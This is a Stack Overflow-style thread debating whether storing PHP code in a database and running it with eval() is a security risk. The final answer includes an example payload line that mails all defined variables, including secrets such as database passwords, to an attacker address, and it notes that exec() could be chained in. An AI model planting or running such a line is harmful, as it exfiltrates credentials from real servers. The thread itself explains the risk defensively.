# Is storing PHP code in a database, and eval()ing it at runtime, insecure?

Tags: php, sql, database, security, eval

I've built a program that stores, retrieves, and `eval()s` code from a SQLite database.

Before I get jumped for my bad coding practices, let's just treat this as a theoretical and *pretend* that I have a good reason for doing so.

All other considerations aside, and assuming that user input is not a factor, is there a *security risk* inherent in storing PHP code in a DB and running it with `eval()`?

**Clarifications:**

- I am not `eval()ing` user-submitted content.
- The SQLite DB file is in the same directory, and has the same security applied to it, as the rest of my files.
- Please no comments on performance, caching, etc.  I'm aware of all that.

Comment: Who can change it? Is it being interpreted in a way in which code could be injected? How do you protect from user-submitted code being run as "native" script?

Comment: In the main, I'm uneasy since this is an approach that not many take, hence it's not really well known what risks their may be.

Comment: @Jared- as I stated no user-submitted code is being used.  The database file will have the same security as the other site files.

Comment: If not, then you may be ok. It seems like a slow method.

Comment: It may or may not be insecure, but regardless, it's an atrocious way of implementing a dispatch table; see: http://en.wikipedia.org/wiki/Dispatch_table

Comment: @George- Who said anything about a dispatch table?

Comment: Nobody said anybody about a dispatch table, but to me this seems like an atrocious implementation of such.  I think by considering what a dispatch table is and what it's benefits are, the OP (yourself) and other readers might devise a better/different implementation

Answer (score 5):

eval() in itself is not inscure. It's just bad practice, unclear and opens up for a whole bunch of bugs and security related issues.

Comment: Could you elaborate on the bugs and security issues with some concrete examples?

Comment: It's also worth noting that eval is slow.  And, not only is it slow, most (all, probably) opcode caches cannot handle it.  (Meaning if you have APC or something, it's rendered useless on any script with eval())

Answer (score 1):

Even if user-submitted data isn't being stored in your database, you're still providing a way to have code stored in the database be executed even if you didn't put that code there. If someone were to gain access to your database server, they could potentially do worse things than drop your database by modifying the code it stores, like deleting any files that the PHP script has write access to.

Answer (score 0):

Yes.  If I can inject something into your database then I could possibly execute it on your server through the eval.

Comment: How will you inject anything if I'm not relying on user-submitted data?

Comment: If you're not relying on user submitted data, then what's the purpose of eval?  Anything you can put into a database yourself, you can put into a php file yourself?  (I guess questioning the purpose of eval does not directly address if it's insecure or not though....)

Comment: Exactly- that's why I'm asking you guys to pretend I've got a reason- I'm trying to understand the security implications only.

Comment: The security implications are very similar to if you directly write code in a php file if you're the only person who can edit the content that is being eval'd.  Just because something is safe doesn't mean you should use it though.  (eval is a horrid, horrid function, and in my opinion has very, very, very, very, very, very, very few legitimate uses)

Comment: Thanks but I'm seeking evidence not opinions.

Comment: I get this feeling that you want eval to be good, and I'm not sure why you do...  But anyway, to be more correct, I should have said that "eval is typically used in a horrid way".  Or even better: "the use of eval tends to lead to worse code".  Can I prove that though?  No.  It's quite difficult to judge the quality of code.  I also believe that eval tends to open up security holes (depends on user input of course though).  I also believe that it's harder to maintain.  And it's fact that eval is slower than non-eval'd equivalent code (especially with multiple runs not being opcode cacheable).

Comment: Anyway, to directly answer your question (and I feel like I should stop spamming Daniel's answer :p)... "assuming that user input is not a factor, is there a security risk inherent in storing PHP code in a DB and running it with eval()?"  If you are completely sure that the input is safe, then using eval is safe.

Comment: @Yarin - What you're suggesting just isn't something that happens very often, so there's not too many who have *experience* with it, much less a complete understanding of it. If you're a doctoral candidate, maybe you can make this your thesis...

Comment: OK, my two cents.  Security is a headache for developers but it is a reality.  Eval is cool because you can execute dynamic code, but it's extremely insecure because you can execute dynamic code.  I say use it if you absolutely don't care about security, otherwise find a way to register trusted code and execute it through an authorized mechanism where there is traceability as to who ran what code.

Comment: -1 such an attack would require query stacking,  which is not possible with mysql.

Comment: No Rook, all I would need to do to exploit an eval() call that executes code from an SQL query is inject code into the table it is querying.  This means that a DBA who has permissions to insert/update data could execute code through veal which they may not have permission to do at the OS level.  So you may want to rethink that -1.

Comment: @rook, Multi-query is enabled in PDO by default.

Answer (score 0):

Are you trying to use the database as a hashtable of functions? So you can call a piece of code depending on some key evaluation. The security problem I see here, is the database may have other API exposed somewhere to populate it. Without you knowing/explicitly doing it, some key,value pair may be introduced in the database. If you used a hashtable of function instead, someone need to make a commit in your code repository to change a function. So now you need to protect the DB as good as your code's repository.

Answer (score 0):

You're letting the database run any PHP code it wants as whatever user the PHP is running as. Of course this is insecure.

Answer (score 0):

`eval()` is not inherently insecure. But it's secure only as far as the code it evaluates is safe. So we could come up with an example of code that does something bad, suppose that there's some way that code got stored in your database, and *boom*.

Code that is stored elsewhere is not part of your project, not code-reviewed, not tracked in git, and not unit-tested. The code is basically not evaluated from a security perspective, so there's no assurance of security. In other words, from a Quality Assurance perspective, it's a weak quality plan, since code security is part of code quality.

Anyone with access to your database can modify code, and then that code is executed, I assume without any review. The code has no access restrictions; it can reference and even modify variables within the application that calls it. So the question is how is the code in your database changed? Who has access? What is the code review process? What is the testing process?

In addition to SQL injection that could change the PHP code in the database illicitly, there's also the security of whatever authentication you use for users before they can make authorized changes to the code. I'm supposing your app has some interface for changing code in the database through a web interface.

You asked for evidence, by which I guess you want an example of code that could do something bad if it were evaluated.

If I can arrange for something like the following code to be stored in your database, and `eval()` that code, I can get a lot of information about your application. E.g. your database password, your authentication methods, the version of the framework you use... all sorts of things.

```
mail('attacker@example.com', 'Mwa ha ha', print_r(get_defined_vars(), true));
```

There are similar functions like `get_defined_functions()` too. Or even return its own source code with `open(__FILE__)`. An attacker can quickly learn where there are other exploitable security holes in your code.

And then there are various ways PHP code can get information about your server, or make changes to your server. Combine `eval()` with code that uses `exec()` and you can run any command on the server. At least it's running under the uid the http server runs as -- which I hope is not root.